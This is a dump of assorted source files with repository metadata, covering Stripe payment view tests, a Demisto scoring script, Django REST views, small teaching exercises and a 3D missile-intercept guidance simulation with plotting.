6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
# Grundsätzliches
####### Methoden von Listen
# kopieren von listen und deren tücken
# richtiges kopieren geht über copy()
# Slicing
| 9.466667 | 38 | 0.697183 |
056b2723acac25910d1251a9850c610b41323569
| 6,042 |
py
|
Python
|
tests/onegov/org/test_views_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/org/test_views_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
tests/onegov/org/test_views_stripe.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import textwrap
import requests_mock
import transaction
from purl import URL
from onegov.form import FormCollection
from onegov.pay import PaymentProviderCollection
def test_setup_stripe(client):
client.login_admin()
assert client.app.default_payment_provider is None
with requests_mock.Mocker() as m:
m.post('https://oauth.example.org/register/foo', json={
'token': '0xdeadbeef'
})
client.get('/payment-provider').click("Stripe Connect")
url = URL(m.request_history[0].json()['url'])
url = url.query_param('oauth_redirect_secret', 'bar')
url = url.query_param('code', 'api_key')
m.post('https://connect.stripe.com/oauth/token', json={
'scope': 'read_write',
'stripe_publishable_key': 'stripe_publishable_key',
'stripe_user_id': 'stripe_user_id',
'refresh_token': 'refresh_token',
'access_token': 'access_token',
})
client.get(url.as_string())
provider = client.app.default_payment_provider
assert provider.title == 'Stripe Connect'
assert provider.publishable_key == 'stripe_publishable_key'
assert provider.user_id == 'stripe_user_id'
assert provider.refresh_token == 'refresh_token'
assert provider.access_token == 'access_token'
def test_stripe_form_payment(client):
collection = FormCollection(client.app.session())
collection.definitions.add('Donate', definition=textwrap.dedent("""
E-Mail *= @@@
Donation *=
(x) Small (10 CHF)
( ) Medium (100 CHF)
"""), type='custom', payment_method='free')
providers = PaymentProviderCollection(client.app.session())
providers.add(type='stripe_connect', default=True, meta={
'publishable_key': '0xdeadbeef',
'access_token': 'foobar'
})
transaction.commit()
page = client.get('/form/donate')
page.form['e_mail'] = '[email protected]'
page = page.form.submit().follow()
assert "Totalbetrag" in page
assert "10.00 CHF" in page
assert "+ 0.59" not in page
assert "Online zahlen und abschliessen" in page
button = page.pyquery('.checkout-button')
assert button.attr('data-stripe-amount') == '1000'
assert button.attr('data-stripe-currency') == 'CHF'
assert button.attr('data-stripe-email') == '[email protected]'
assert button.attr('data-stripe-description') == 'Donate'
assert button.attr('data-action') == 'submit'
assert button.attr('data-stripe-allowrememberme') == 'false'
assert button.attr('data-stripe-key') == '0xdeadbeef'
with requests_mock.Mocker() as m:
charge = {
'id': '123456'
}
m.post('https://api.stripe.com/v1/charges', json=charge)
m.get('https://api.stripe.com/v1/charges/123456', json=charge)
m.post('https://api.stripe.com/v1/charges/123456/capture', json=charge)
page.form['payment_token'] = 'foobar'
page.form.submit().follow()
with requests_mock.Mocker() as m:
m.get('https://api.stripe.com/v1/charges/123456', json={
'id': '123456',
'captured': True,
'refunded': False,
'paid': True,
'status': 'foobar'
})
client.login_admin()
ticket = client.get('/tickets/ALL/open').click('Annehmen').follow()
assert "Bezahlt" in ticket
payments = client.get('/payments')
assert "FRM-" in payments
assert "Stripe Connect" in payments
assert "[email protected]" in payments
assert "9.41 CHF" in payments
assert "0.59" in payments
def test_stripe_charge_fee_to_customer(client):
collection = FormCollection(client.app.session())
collection.definitions.add('Donate', definition=textwrap.dedent("""
E-Mail *= @@@
Donation *=
(x) Small (10 CHF)
( ) Medium (100 CHF)
"""), type='custom', payment_method='free')
providers = PaymentProviderCollection(client.app.session())
providers.add(type='stripe_connect', default=True, meta={
'publishable_key': '0xdeadbeef',
'access_token': 'foobar',
'user_id': 'foobar'
})
transaction.commit()
client.login_admin()
with requests_mock.Mocker() as m:
m.get('https://api.stripe.com/v1/accounts/foobar', json={
'business_name': 'Govikon',
'email': '[email protected]'
})
page = client.get('/payment-provider').click("Einstellungen", index=1)
assert 'Govikon / [email protected]' in page
page.form['charge_fee_to_customer'] = True
page.form.submit()
page = client.get('/form/donate')
page.form['e_mail'] = '[email protected]'
page = page.form.submit().follow()
assert "Totalbetrag" in page
assert "10.00 CHF" in page
assert "+ 0.61 CHF Kreditkarten-Gebühr" in page
assert "Online zahlen und abschliessen" in page
button = page.pyquery('.checkout-button')
assert button.attr('data-stripe-amount') == '1061'
with requests_mock.Mocker() as m:
charge = {
'id': '123456'
}
m.post('https://api.stripe.com/v1/charges', json=charge)
m.get('https://api.stripe.com/v1/charges/123456', json=charge)
m.post('https://api.stripe.com/v1/charges/123456/capture', json=charge)
page.form['payment_token'] = 'foobar'
page.form.submit().follow()
with requests_mock.Mocker() as m:
m.get('https://api.stripe.com/v1/charges/123456', json={
'id': '123456',
'captured': True,
'refunded': False,
'paid': True,
'status': 'foobar'
})
client.login_admin()
ticket = client.get('/tickets/ALL/open').click('Annehmen').follow()
assert "Bezahlt" in ticket
payments = client.get('/payments')
assert "FRM-" in payments
assert "Stripe Connect" in payments
assert "[email protected]" in payments
assert "10.00" in payments
assert "0.61" in payments
| 31.8 | 79 | 0.621483 |
55bfc7818aa8a05d043b5108689fcc5d932be692
| 739 |
py
|
Python
|
Packs/CommonScripts/Scripts/AddDBotScoreToContext/AddDBotScoreToContext.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CommonScripts/Scripts/AddDBotScoreToContext/AddDBotScoreToContext.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CommonScripts/Scripts/AddDBotScoreToContext/AddDBotScoreToContext.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
def main():
indicator = demisto.args().get("indicator")
indicatorType = demisto.args().get("indicatorType")
score = int(demisto.args().get("score"))
vendor = demisto.args().get("vendor")
reliability = demisto.args().get("reliability", None)
dbotscore = {
"Indicator": indicator,
"Type": indicatorType,
"Vendor": vendor,
"Score": score,
"Reliability": reliability
}
command_results = CommandResults(
outputs_prefix='DBotScore',
outputs=dbotscore
)
return_results(command_results)
if __name__ == "__builtin__" or __name__ == "builtins":
main()
| 25.482759 | 57 | 0.635995 |
ddf9ac169d140abae128b95a53b90bd57ee92765
| 108 |
py
|
Python
|
codeit/algorithm/util.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
codeit/algorithm/util.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
codeit/algorithm/util.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
def test_value(result, answer):
print(f'result: {result}, answer: {answer}')
assert result == answer
| 36 | 48 | 0.675926 |
fb13ee8a809350a976e17c58ff2ac4031d8ab41a
| 697 |
py
|
Python
|
grader/tools/grade-from-links.py
|
LammingerL/selfie
|
93a094b6b33be000192e0eab946a462a3291907c
|
[
"BSD-2-Clause"
] | null | null | null |
grader/tools/grade-from-links.py
|
LammingerL/selfie
|
93a094b6b33be000192e0eab946a462a3291907c
|
[
"BSD-2-Clause"
] | null | null | null |
grader/tools/grade-from-links.py
|
LammingerL/selfie
|
93a094b6b33be000192e0eab946a462a3291907c
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
import os
if len(sys.argv) == 4:
filename = sys.argv[1]
target = sys.argv[2]
assignment = sys.argv[3]
else:
print "usage: python grade-from-links.py text-file-with-github-links directory-where-repos-are assignment"
sys.exit(1)
file = open(filename, "r")
os.chdir(target)
for link in file.readlines():
link = link.replace("\n", "").split("/")
user = link[3]
repo = link[4]
commit = link[6]
print "\n\n" + user + "/" + repo + ":"
os.chdir(user)
os.chdir(repo)
os.system("git fetch")
os.system("git checkout " + commit)
os.system("make")
os.system("python3 grader/self.py " + assignment)
os.chdir(os.path.pardir)
os.chdir(os.path.pardir)
file.close()
| 18.837838 | 107 | 0.649928 |
34e93761ac699bc1a45aad8d542a8501afee2d5f
| 1,375 |
py
|
Python
|
docker/django/restaurant/restapps/views/views.py
|
gitmehedi/cloudtuts
|
3008b1cf7fbf22728c9bb2c059c4bd196043a93e
|
[
"Unlicense"
] | 3 |
2019-08-29T10:14:40.000Z
|
2021-03-05T09:50:15.000Z
|
docker/django/restaurant/restapps/views/views.py
|
gitmehedi/cloudtuts
|
3008b1cf7fbf22728c9bb2c059c4bd196043a93e
|
[
"Unlicense"
] | null | null | null |
docker/django/restaurant/restapps/views/views.py
|
gitmehedi/cloudtuts
|
3008b1cf7fbf22728c9bb2c059c4bd196043a93e
|
[
"Unlicense"
] | 1 |
2021-03-05T09:50:29.000Z
|
2021-03-05T09:50:29.000Z
|
from django.shortcuts import render
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view
from .models import *
from .serializers import *
@api_view(['GET', 'POST'])
def api_restaurant_list_view(request):
restaurant = Restaurant.objects.all()
if request.method == 'GET':
serializer = RestaurantSerializer(restaurant, many=True)
return Response(serializer.data)
if request.method == 'POST':
data = {}
serializer = RestaurantSerializer(data=request.data['params'])
if serializer.is_valid():
serializer.save()
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors,status=status.HTTP_404_NOT_FOUND)
@api_view(['GET','POST'])
def api_menu_list_view(request):
menu = Menu.objects.all()
if request.method == 'GET':
serializer = MenuSerializer(menu,many=True)
return Response(serializer.data)
if request.method == 'POST':
data = {}
serializer = MenuSerializer(data=request.data['params'], many=True)
if serializer.is_valid():
serializer.save()
return Response(data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_404_NOT_FOUND)
| 33.536585 | 80 | 0.679273 |
2f1966dacb6855ebe339bf13c45835286cb99037
| 2,234 |
py
|
Python
|
venv/Lib/site-packages/pynance/learn/linreg.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 35 |
2015-03-12T04:16:14.000Z
|
2020-12-17T18:10:15.000Z
|
venv/Lib/site-packages/pynance/learn/linreg.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 31 |
2015-03-16T21:31:04.000Z
|
2021-01-26T00:12:34.000Z
|
venv/Lib/site-packages/pynance/learn/linreg.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 18 |
2015-09-30T10:40:26.000Z
|
2021-01-25T21:20:44.000Z
|
"""
.. Copyright (c) 2014, 2015 Marshall Farrier
license http://opensource.org/licenses/MIT
Linear regression (:mod:`pynance.learn.linreg`)
===============================================
.. currentmodule:: pynance.learn.linreg
"""
import numpy as np
def run(features, labels, regularization=0., constfeat=True):
"""
Run linear regression on the given data.
.. versionadded:: 0.5.0
If a regularization parameter is provided, this function
is a simplification and specialization of ridge
regression, as implemented in `scikit-learn
<http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.Ridge.html#sklearn.linear_model.Ridge>`_.
Setting `solver` to `'svd'` in :class:`sklearn.linear_model.Ridge` and equating
our `regularization` with their `alpha` will yield the same results.
Parameters
----------
features : ndarray
Features on which to run linear regression.
labels : ndarray
Labels for the given features. Multiple columns
of labels are allowed.
regularization : float, optional
Regularization parameter. Defaults to 0.
constfeat : bool, optional
Whether or not the first column of features is
the constant feature 1. If True, the first column
will be excluded from regularization. Defaults to True.
Returns
-------
model : ndarray
Regression model for the given data.
"""
n_col = (features.shape[1] if len(features.shape) > 1 else 1)
reg_matrix = regularization * np.identity(n_col, dtype='float64')
if constfeat:
reg_matrix[0, 0] = 0.
# http://stackoverflow.com/questions/27476933/numpy-linear-regression-with-regularization
return np.linalg.lstsq(features.T.dot(features) + reg_matrix, features.T.dot(labels))[0]
def predict(features, model):
"""
Generate predictions from features and model.
.. versionadded:: 0.5.0
Parameters
----------
features : ndarray
Features from which to generate predictions
model : ndarray
Regression model.
Returns
-------
predicted : ndarray
Predictions generated from features using model.
"""
return features.dot(model)
| 29.786667 | 116 | 0.662936 |
c0b98c972917e6f1cb04039b8fcda0adb3320e7b
| 1,630 |
py
|
Python
|
algorithm/sorting_algorithms_in_python/bubble_sort.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
algorithm/sorting_algorithms_in_python/bubble_sort.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
algorithm/sorting_algorithms_in_python/bubble_sort.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
from random import randint
from sorting_timer import run_sorting_algorithm, ARRAY_LENGTH
def bubble_sort(array):
n = len(array)
for i in range(n):
# Create a flag that will allow the function to
# terminate early if there's nothing left to sort
already_sorted = True
# Start looking at each time of the list one by one,
# comparing it with its adjacent value. With each
# iteration, the portion of the array that you look at
# shrinks because the ramaining items have already been
# sorted.
for j in range(n - i - 1):
if array[j] > array[j + 1]:
# If the item you're looking at is greater than its
# adjacent value, then swap them
array[j], array[j + 1] = array[j + 1], array[j]
# Since you had to swap two elements,
# set the `already_sorted` flag to `False` so the
# algorithm doesn't finish prematurely
already_sorted = False
# If there were no swaps during the last iteration,
# the array is already sorted, and you can terminate
if already_sorted:
break
return array
if __name__ == "__main__":
# Generate an array of `ARRAY_LENGTH` items consisting
# of random integer values between 0 and 999
array = [randint(0, 1000) for i in range(ARRAY_LENGTH)]
# Call the function using the name of the sorting algorithm
# and the array you just created
run_sorting_algorithm(algorithm="bubble_sort", array=array)
| 36.222222 | 68 | 0.609202 |
c0d96859eecd3d674121156205f6ba9a78c359eb
| 361 |
py
|
Python
|
Chapter2_Basics/Strings.py
|
franneck94/UdemyPythonIntro
|
4895a91a04eedce7d59b61bf12e5aa209fe60f85
|
[
"MIT"
] | 2 |
2021-02-13T19:18:00.000Z
|
2021-11-10T09:54:49.000Z
|
Chapter2_Basics/Strings.py
|
franneck94/UdemyPythonIntro
|
4895a91a04eedce7d59b61bf12e5aa209fe60f85
|
[
"MIT"
] | null | null | null |
Chapter2_Basics/Strings.py
|
franneck94/UdemyPythonIntro
|
4895a91a04eedce7d59b61bf12e5aa209fe60f85
|
[
"MIT"
] | null | null | null |
name = "Jan Maximilan Schaffranek"
result = name.find("an")
if result == -1:
print("Not found")
else:
print("Found at index: ", result)
name2 = name.replace("Jan", "Yann")
print(name)
print(name2)
name3 = name.upper()
print(name3)
name4 = name.lower()
print(name4)
name5 = name.split(" ")
print(name5)
count = name.count("an")
print(count)
| 11.645161 | 37 | 0.642659 |
c0de37b7e234e77dbe1666c79be0886d512a7b89
| 1,914 |
py
|
Python
|
Praxisseminar/physical_process.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | null | null | null |
Praxisseminar/physical_process.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | 2 |
2020-06-24T13:01:22.000Z
|
2020-06-24T13:10:07.000Z
|
Praxisseminar/physical_process.py
|
EnjoyFitness92/Praxisseminar-SS2020
|
b5baba5d1512a5fad3391efc42f3ab232d79c4e2
|
[
"MIT"
] | null | null | null |
"""
IN BEARBEITUNG:
- physischer Prozess im End Effekt nur starten und beenden des Fliessbandes und Bestimmen der Geschwindigkeit des Motors
Fliessband physical process
"""
from minicps.devices import Tank
#from utils import MOTOR_VEL
from utils import STATE, MOTOR_VEL, Praxisseminar_test_logger
import sys
import time
# Praxisseminar TAGS
# Beispiel: MV101 = ('MV101', 1)
MOTOR = ('MOTOR', 1)
SENSOR = ('SENSOR', 1)
# Praxisseminar TAGS
# Doch Klasse Tank verwendet da eigene Klasse nicht in Python Pfad hinterlegt ist
class ConveyorBelt(Tank):
def pre_loop(self, sleep=0.1):
# Praxisseminar STATE INIT(
# Standardmaessig ist der Motor des Foerderbandes an
get_m11 = self.get(MOTOR)
Praxisseminar_test_logger.info('Motor: ' + str(get_m11))
# Praxisseminar STATE INIT)
def main_loop(self, sleep=0.1):
count = 0
while True:
# ueberpruefe ob Motor an ist
# wenn ja dann setze standarmaessig Anfangsgeschwindigkeit
motor = self.get(MOTOR)
Praxisseminar_test_logger.info('Motor: ' + str(motor))
if int(motor) == 1:
new_velocity = self.get(SENSOR)
Praxisseminar_test_logger.info('Sensor: ' + str(new_velocity))
self.set(SENSOR, new_velocity)
Praxisseminar_test_logger.info('Sensordaten wurden veraendert: ' + str(new_velocity))
# DEBUG 'Standarmaessige Motorgeschwindigkeit
else:
self.set(SENSOR, MOTOR_VEL['MIN'])
Praxisseminar_test_logger.info('Sensordaten wurden veraendert: ' + str(MOTOR_VEL['MIN']))
time.sleep(sleep)
count += 1
if __name__ == '__main__':
# section, level, protocol???
cb = ConveyorBelt(
name='cb',
state=STATE,
protocol=None,
section=None,
level=None
)
| 24.857143 | 120 | 0.635319 |
7b4054c0fab1cb42e9849789454ddaa7ab4f1d54
| 349 |
py
|
Python
|
PINp/2014/Chernov_M_S/task_2_27.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PINp/2014/Chernov_M_S/task_2_27.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PINp/2014/Chernov_M_S/task_2_27.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Задача 2. Вариант 27.
# Напишите программу, которая будет выводить на экран наиболее понравившееся
# вам высказывание, автором которого является Овидий. Не забудьте о том, что
# автор должен быть упомянут на отдельной строке.
# Чернов Михаил Сергеевич
# 28.05.2016
print("Верь опыту")
print("\n\t\tОвидий")
input("\n\nНажмите Enter для выхода.")
| 31.727273 | 76 | 0.765043 |
7b94e457a9e74ffbf8995bba913eb090c55bbf15
| 16,133 |
py
|
Python
|
GymFlight.py
|
kirtis26/Missile3D
|
23a868b34f7362dac5ce0dff254d990f4d0c4e92
|
[
"MIT"
] | null | null | null |
GymFlight.py
|
kirtis26/Missile3D
|
23a868b34f7362dac5ce0dff254d990f4d0c4e92
|
[
"MIT"
] | null | null | null |
GymFlight.py
|
kirtis26/Missile3D
|
23a868b34f7362dac5ce0dff254d990f4d0c4e92
|
[
"MIT"
] | null | null | null |
import numpy as np
from Missile3D import Missile3D
from Target3D import Target3D
import matplotlib.pyplot as plt
from easyvec import Vec3
class GymFlight(object):
scenario_names = {'standard', 'random', 'sample_1', 'sample_2', 'sample_3', 'sample_4'}
standard_target_opts = {
'pos': Vec3(8e3, 1.5e3, 0),
'pos_aim': Vec3(-100, 0, 100),
'vel': Vec3(-100, 10, 10),
'vel_aim': Vec3(-100, -10, -10)
}
sample_target_opts_1 = {
'pos': Vec3(10e3, 3e3, 3e3),
'pos_aim': Vec3(-100, 0, -1e3),
'vel': Vec3(-100, 10, -50),
'vel_aim': Vec3(-100, -10, -10)
}
sample_target_opts_2 = {
'pos': Vec3(10e3, 3e3, 0),
'pos_aim': Vec3(-100, 0, 0),
'vel': Vec3(-100, 10, 0),
'vel_aim': Vec3(-100, -10, 0)
}
sample_target_opts_3 = {
'pos': Vec3(20e3, 2e3, 0),
'pos_aim': Vec3(-1e3, 0, -10e3),
'vel': Vec3(-100, -10, -100),
'vel_aim': Vec3(-100, -10, -100)
}
sample_target_opts_4 = {
'pos': Vec3(10e3, 4e3, 3e3),
'pos_aim': Vec3(1e3, 0, -5e3),
'vel': Vec3(-100, -10, -10),
'vel_aim': Vec3(-10, -10, -100)
}
@classmethod
def make_simple_scenario(cls,
missile_opts,
target_opts,
tau=0.5,
ndt=10,
n_step=50,
t_max=50,
fly_time_min=False,
postProcessing=True):
mis = Missile3D.get_missile(missile_opts,
postProcessing=postProcessing)
trg = Target3D.get_simple_target(target_opts,
time_min=fly_time_min,
postProcessing=postProcessing)
mis.set_initial_parameters_of_missile(trg)
return cls(mis=mis, trg=trg, n_step=n_step, tau=tau, ndt=ndt, t_max=t_max)
@classmethod
def make_scenario(cls,
missile_opts,
scenario_name=None,
target_opts=None,
tau=0.5,
ndt=10,
n_step=50,
t_max=50,
fly_time_min=False,
postProcessing=True):
"""
Классовый метод создания сценария движения цели
----------
arguments:
missile_opts {dict} - словарь с параметрами ракеты
scenario_name {str} - название сценария
tau {float} - временной шаг моделирования, с
ndt {int} - количество шагов разбиения временного интервала tau (количество шагов интегрирования)
n_step {int} - максимальное количество временных шагов tau
t_max {float/int} - максимальное время полета, с
fly_time_min {bool} - флаг поиска минимального времени по максимальному значению перегрузки
postProcessing {bool} - постобработка результатов (запись) в словарь данных
returns:
{cls} - объект класса GymFlight
"""
key_args = tau, ndt, n_step, t_max, fly_time_min, postProcessing
if scenario_name is not None and scenario_name not in cls.scenario_names:
raise AttributeError(f'Error! Unknown scenario: "{scenario_name}" \n'
f'Available scenarios: {cls.scenario_names}')
elif scenario_name is None:
if target_opts is None:
raise AttributeError(f'Error! Argument Key "target_opts" does not: "{target_opts}" \n'
f'Example: {cls.standard_target_opts}')
else:
return cls.make_simple_scenario(missile_opts, target_opts, *key_args)
elif scenario_name == 'standard':
return cls.make_simple_scenario(missile_opts, cls.standard_target_opts, *key_args)
elif scenario_name == 'random':
return cls.make_simple_scenario(missile_opts, Target3D.get_random_parameters(), *key_args)
elif scenario_name == 'sample_1':
return cls.make_simple_scenario(missile_opts, cls.sample_target_opts_1, *key_args)
elif scenario_name == 'sample_2':
return cls.make_simple_scenario(missile_opts, cls.sample_target_opts_2, *key_args)
elif scenario_name == 'sample_3':
return cls.make_simple_scenario(missile_opts, cls.sample_target_opts_3, *key_args)
elif scenario_name == 'sample_4':
return cls.make_simple_scenario(missile_opts, cls.sample_target_opts_4, *key_args)
def __init__(self, **kwargs):
"""
Конструктор класса GymFlight:
missile - объект класса Missile3D
target - объект класса Target3D
n_step - число шагов tau, на котором управляющее воздействие постоянно
tau - шаг моделирования, с
ndt - число шагов интегрирования, на которое разбивается временной интервал tau
t_max - максимальное время полета, с
"""
self.missile = kwargs['mis']
self.target = kwargs['trg']
self.i_step = 0
self.n_step = kwargs['n_step']
self.tau = kwargs['tau']
self.ndt = kwargs['ndt']
self.t_max = kwargs['t_max']
self.history = None
def run(self, decr_tau=False, decr_n=100, decr_dist=500):
"""
Метод класса, запускающий моделирование инициилизированного сценария
argument: none
return: none
"""
done = False
while not done:
self.step()
self.get_info_about_step()
self.i_step += 1
done, info = self.get_info_about_step()
if decr_tau and self._r_() < decr_dist:
self.tau /= decr_n
self.missile.am = 1
decr_tau = False
print(f'Info launch missile: {info}')
self.history = {'missile': self.missile.history, 'target': self.target.history} if self.missile.postProcessing else self.get_state()
def reset(self):
"""
Метод, возвращающий ракету и цель в начальное состояние
"""
self.missile.reset()
self.target.reset()
def step(self):
"""
Метод, совершающий шаг во времени tau, на котором управляющее воздействие на ракету постоянно
"""
self.target.step(tau=self.tau, n=self.ndt)
self.missile.step(self.missile.get_action_proportional_guidance(self.target), tau=self.tau, n=self.ndt)
def get_info_about_step(self):
"""
Метод, возвращающий информацию о проделанном временном шаге tau - проверка остановки расчета
returns:
{bool}, {str} - флаг остановки, причина остановки
"""
if self._r_() < self.missile.r_explosion:
return True, 'target defeat'
elif self.missile.t > 0 and self.missile.pos[1] <= 0:
return True, 'missile fail'
elif abs(self.missile.alpha_targeting) > 90 or abs(self.missile.betta_targeting) > 90:
return True, 'missile miss'
elif self.missile.t > self.t_max:
return True, 'long fly time'
elif self.i_step > self.n_step:
return True, 'count step max'
else:
return False, ''
def get_state(self):
"""
Получить текущие параметры ракеты и цели в виде словаря данных
return: {dict}
"""
return {'missile': self.missile.state,
'target': self.target.state}
def to_dict(self):
"""
Преобразовать все параметры ракеты и цели в словарь данных
return: {dict}
"""
return {'missile': self.missile.to_dict(),
'target': self.target.to_dict()}
def plot(self, dpi=150,
ls_trg_full='--', ls_trg='-', ls_mis='-',
color_trg_full='darkorange', color_trg='red', color_mis='darkblue',
marker_meet='o', color_marker_meet='red', marker_size=15,
marker_trg='x', color_marker_trg='red', color_marker_size=30,
loc_legend='best', legend_size=8,
savefig=False,
):
traj = self.target.get_traject(self.target.fly_time)
res = self.to_dict()
plt.figure(dpi=dpi)
ax = plt.axes(projection='3d')
ax.plot(traj[:, 0], traj[:, 2], traj[:, 1],
ls=ls_trg_full, color=color_trg_full, label='Полная траектория цели')
ax.plot(res['target']['x'], res['target']['z'], res['target']['y'],
ls=ls_trg, color=color_trg, label='Траектория цели')
ax.plot(res['missile']['pos'][:, 0], res['missile']['pos'][:, 2], res['missile']['pos'][:, 1],
ls=ls_mis, color=color_mis, label='Траектория ракеты')
ax.scatter(res['target']['x'][-1], res['target']['z'][-1], res['target']['y'][-1],
marker=marker_meet, color=color_marker_meet, s=marker_size, label='Точка встречи')
ax.scatter(traj[:, 0][-1], traj[:, 2][-1], traj[:, 1][-1],
marker=marker_trg, color=color_marker_trg, s=color_marker_size, label='Конечное положение цели')
ax.set_xlabel('$X$, м')
ax.set_ylabel('$Z$, м')
ax.set_zlabel('$Y$, м')
ax.view_init(elev=20, azim=-150)
plt.legend(loc=loc_legend, fontsize=legend_size)
if savefig:
plt.savefig('scenario_render.jpg', dpi=dpi)
plt.show()
def plot_trajectory(self, figsize=(15, 5), fontsize=14, labelsize=12, labelpad=0, dpi=400, savefig=False):
res = self.to_dict()
fig = plt.figure(figsize=figsize)
ax_1 = fig.add_subplot(1, 3, 1)
ax_2 = fig.add_subplot(1, 3, 2)
ax_3 = fig.add_subplot(1, 3, 3)
ax_1.plot(res['missile']['pos'][:, 0], res['missile']['pos'][:, 1], label='Траектория ракеты')
ax_1.plot(res['target']['x'], res['target']['y'], label='Траектория цели')
ax_2.plot(res['missile']['pos'][:, 2], res['missile']['pos'][:, 0])
ax_2.plot(res['target']['z'], res['target']['x'])
ax_3.plot(res['missile']['pos'][:, 2], res['missile']['pos'][:, 1])
ax_3.plot(res['target']['z'], res['target']['y'])
ax_1.set_xlabel('$x$, м', fontsize=fontsize, labelpad=labelpad)
ax_1.set_ylabel('$y$, м', fontsize=fontsize, labelpad=labelpad)
ax_2.set_xlabel('$z$, м', fontsize=fontsize, labelpad=labelpad)
ax_2.set_ylabel('$x$, м', fontsize=fontsize, labelpad=labelpad)
ax_3.set_xlabel('$z$, м', fontsize=fontsize, labelpad=labelpad)
ax_3.set_ylabel('$y$, м', fontsize=fontsize, labelpad=labelpad)
ax_1.set(title='X0Y')
ax_2.set(title='Z0X')
ax_3.set(title='Z0Y')
ax_1.legend(fontsize=fontsize)
ax_1.tick_params(labelsize=labelsize)
ax_2.tick_params(labelsize=labelsize)
ax_3.tick_params(labelsize=labelsize)
if savefig:
plt.savefig('scenario_projection.jpg', dpi=dpi)
plt.show()
def plot_motion_parameters(self, figsize=(15, 7), fontsize=14, labelsize=12, labelpad=0, dpi=400, savefig=False):
fig = plt.figure(figsize=figsize)
ax_1 = fig.add_subplot(2, 2, 1)
ax_2 = fig.add_subplot(2, 2, 2)
ax_3 = fig.add_subplot(2, 2, 3)
ax_4 = fig.add_subplot(2, 2, 4)
ax_1.plot(self.missile.history['t'], self.missile.history['v_abs'], label='$V(t)$')
ax_2.plot(self.missile.history['t'], np.degrees(self.missile.history['thetta']), label='θ')
ax_2.plot(self.missile.history['t'], np.degrees(self.missile.history['psi']), label='ψ')
ax_2.plot(self.missile.history['t'], np.degrees(self.missile.history['gamma']), label='γ')
ax_3.plot(self.missile.history['t'], self.missile.history['qw'], label='$q_w$')
ax_3.plot(self.missile.history['t'], self.missile.history['qx'], label='$q_x$')
ax_3.plot(self.missile.history['t'], self.missile.history['qy'], label='$q_y$')
ax_3.plot(self.missile.history['t'], self.missile.history['qz'], label='$q_z$')
ax_4.plot(self.missile.history['t'], self.missile.history['alpha'], label='α')
ax_4.plot(self.missile.history['t'], self.missile.history['betta'], label='β')
ax_4.plot(self.missile.history['t'], self.missile.history['alpha_targeting'], label='α$_{targeting}$')
ax_4.plot(self.missile.history['t'], self.missile.history['betta_targeting'], label='β$_{targeting}$')
ax_1.set_ylabel('$V$, м/c', fontsize=fontsize, labelpad=labelpad)
ax_2.set_ylabel('$angle$, град', fontsize=fontsize, labelpad=labelpad)
ax_3.set_xlabel('$t$, c', fontsize=fontsize, labelpad=labelpad)
ax_3.set_ylabel('$q$', fontsize=fontsize, labelpad=labelpad)
ax_4.set_xlabel('$t$, c', fontsize=fontsize, labelpad=labelpad)
ax_4.set_ylabel('$angle$, град', fontsize=fontsize, labelpad=labelpad)
ax_1.set_title(label='Профиль скорости', fontdict={'fontsize': fontsize})
ax_2.set_title(label='Углы ориентации ракеты', fontdict={'fontsize': fontsize})
ax_3.set_title(label='Кватернионы', fontdict={'fontsize': fontsize})
ax_4.set_title(label='Управляющие углы', fontdict={'fontsize': fontsize})
ax_1.legend(fontsize=fontsize)
ax_2.legend(fontsize=fontsize)
